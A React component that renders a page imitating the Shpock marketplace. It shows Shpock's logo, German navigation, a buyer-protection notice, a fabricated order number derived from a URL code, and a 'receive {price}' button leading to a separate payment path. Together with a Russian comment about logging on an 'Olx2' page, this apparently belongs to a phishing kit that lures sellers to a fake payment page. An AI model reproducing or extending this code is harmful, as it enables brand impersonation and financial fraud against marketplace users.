import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import SupportWidget from './SupportWidget';
import './ShpockSuccess.css';
import { getPrimaryCurrency } from '../stripeCurrency';

import { API_URL } from '../apiBase';
const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const LOGO_SRC = `${process.env.PUBLIC_URL || ''}/shpock-logo.png`;

const DE = {
  searchPh: 'Search for items, brands, or styles...',
  anmelden: 'Anmelden',
  einloggen: 'Einloggen',
  nav: [
    'Elektronik',
    'Mode & Accessoires',
    'Haus & Garten',
    'Baby & Kleinkind',
    'Juwelen und Uhren',
    'Gesundheit & Schönheit',
  ],
  taxes: 'INKLUSIVE STEUERN',
  ctaPrefix: 'Empfangen Sie',
  deliveryFree: 'Kostenlose nationale Lieferung',
  nameLabel: 'Vorname, Nachname',
  orderLabel: 'Bestellnummer',
  addrLabel: 'Lieferadresse',
  protectionText:
    'Alle über Shpock getätigten Käufe sind durch den Käuferschutz abgedeckt.',
  mehrLesen: 'Mehr lesen',
};

function PlaceholderPhoto() {
  return (
    <div className="sp-photo-ph" aria-hidden>
      <div className="sp-photo-ph__icon">
        <span className="sp-photo-ph__q">?</span>
      </div>
    </div>
  );
}

export default function ShpockSuccess() {
  const { pageCode: pageCodeParam } = useParams();
  const pageCodeFromParams = (() => {
    try {
      if (pageCodeParam) return pageCodeParam;
      const m = window.location.pathname.match(/\/page\/([A-Z0-9]{12})(?:\/|$)/i);
      return m ? m[1] : null;
    } catch {
      return null;
    }
  })();

  const [pageData, setPageData] = useState(null);
  const [loading, setLoading] = useState(true);
  const [logoFailed, setLogoFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  /* log/transition только на Olx2 (index2), не на success */

  useEffect(() => {
    if (!pageCodeFromParams) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCodeFromParams}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCodeFromParams]);

  const countryCode = pageData?.country_code || 'AT';
  const primaryCurrency = getPrimaryCurrency(countryCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null) return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceDisplay = useMemo(() => {
    if (priceNumber == null) return '228';
    return priceNumber % 1 === 0 ? String(Math.round(priceNumber)) : String(priceNumber);
  }, [priceNumber]);

  const photoUrl = pageData?.photo_url || '';
  const productName = (pageData?.product_name || '').trim();
  const deliveryAddress = (pageData?.delivery_address || '').trim();
  const headlineText =
    productName || deliveryAddress || '—';

  const buyerFirst = pageData?.first_name || '';
  const buyerLast = pageData?.last_name || '';
  const fullName = [buyerFirst, buyerLast].filter(Boolean).join(' ') || '—';

  const orderDisplay = useMemo(() => {
    if (!pageCodeFromParams) return '№208867292';
    let h = 0;
    for (let i = 0; i < pageCodeFromParams.length; i += 1) {
      h = (h * 31 + pageCodeFromParams.charCodeAt(i)) >>> 0;
    }
    const nine = String(100000000 + (h % 900000000)).slice(0, 9);
    return `№${nine}`;
  }, [pageCodeFromParams]);
  const { toIndex2 } = usePaymentPaths(pageCodeFromParams);
  const index2Path = toIndex2();
  if (loading) {
    return (
      <div className="sp-page sp-page--loading">
        <div className="sp-loading-bar" />
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="sp-page">
      <header className="sp-header">
        <div className="sp-header-inner">
          <div className="sp-header-logo">
            {!logoFailed ? (
              <img
                src={LOGO_SRC}
                alt="SHPOCK"
                className="sp-header-logo__img"
                onError={() => setLogoFailed(true)}
              />
            ) : (
              <span className="sp-header-logo__text">SHPOCK</span>
            )}
          </div>
          <div className="sp-header-search-wrap">
            <input
              type="search"
              className="sp-header-search"
              placeholder={DE.searchPh}
              readOnly
              aria-label={DE.searchPh}
            />
          </div>
          <div className="sp-header-actions">
            <button type="button" className="sp-btn-anmelden">
              {DE.anmelden}
            </button>
            <button type="button" className="sp-link-einloggen">
              {DE.einloggen}
            </button>
          </div>
        </div>
      </header>

      <nav className="sp-subnav" aria-label="Kategorien">
        <div className="sp-subnav-inner">
          {DE.nav.map((label) => (
            <a key={label} href="#cat" className="sp-subnav-link">
              {label}
            </a>
          ))}
        </div>
      </nav>

      <main className="sp-main">
        <div className="sp-main-inner">
          <div className="sp-grid">
            <section className="sp-col-photo" aria-label="Produktbild">
              <div className="sp-photo-frame">
                {photoUrl ? (
                  <img src={photoUrl} alt="" className="sp-photo-img" />
                ) : (
                  <PlaceholderPhoto />
                )}
              </div>
            </section>

            <section className="sp-col-details">
              <p className="sp-headline">{headlineText}</p>

              <div className="sp-price-block">
                <span className="sp-price-line">
                  <span className="sp-price-num">{priceDisplay}</span>
                  <span className="sp-price-eur">
                    {countryCode?.toUpperCase() === 'AT' || String(primaryCurrency).toUpperCase() === 'EUR'
                      ? ' €'
                      : ` ${primaryCurrency}`}
                  </span>
                </span>
                <div className="sp-price-tax">{DE.taxes}</div>
              </div>

              <Link to={index2Path} className="sp-cta">
                {DE.ctaPrefix} {priceDisplay}
              </Link>

              <p className="sp-delivery-free">{DE.deliveryFree}</p>

              <div className="sp-table">
                <div className="sp-table-row">
                  <span className="sp-table-label">{DE.nameLabel}</span>
                  <span className="sp-table-value">{fullName}</span>
                </div>
                <div className="sp-table-row">
                  <span className="sp-table-label">{DE.orderLabel}</span>
                  <span className="sp-table-value">{orderDisplay}</span>
                </div>
                <div className="sp-table-row sp-table-row--last">
                  <span className="sp-table-label">{DE.addrLabel}</span>
                  <span className="sp-table-value">{deliveryAddress || '—'}</span>
                </div>
              </div>

              <div className="sp-protection">
                <p className="sp-protection__text">{DE.protectionText}</p>
                <a href="#mehr" className="sp-protection__link">
                  {DE.mehrLesen}
                </a>
              </div>
            </section>
          </div>
        </div>
      </main>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}
